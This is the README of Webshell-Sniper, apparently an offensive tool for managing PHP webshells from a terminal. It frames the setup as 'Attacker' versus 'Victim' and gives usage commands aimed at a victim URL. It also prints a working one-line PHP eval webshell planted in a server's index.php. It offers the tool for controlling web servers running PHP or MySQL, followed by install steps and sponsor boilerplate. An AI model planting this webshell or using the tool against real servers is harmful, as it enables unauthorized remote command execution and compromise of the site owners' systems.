Webshell-Sniper
A webshell manager via terminal
Usage :
Usage :
python webshell-sniper.py [URL] [METHOD] [AUTH]
Example :
python webshell-sniper.py http://127.0.0.1/c.php POST c
Author :
WangYihang <[email protected]>
# cat /var/www/html/index.php
<?php eval($_POST['s3cr3t']);?>
# python webshell-sniper.py http://victim.com/index.php POST s3cr3t
...
Installation:
git clone https://github.com/WangYihang/Webshell-Sniper
cd Webshell-Sniper
pip install -r requirements.txt
Example :
v1.1.2
Compatibility :
Enviroment :
Attacker :
Linux
python 2.7
Victim :
apache 2.4
php 7.0
Addations:
- This tool only support to run on unix-like system.
- It is able to help user control web server which is running PHP or MySQL.
Contributors
This project exists thanks to all the people who contribute.
Backers
Thank you to all our backers!
Sponsors
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]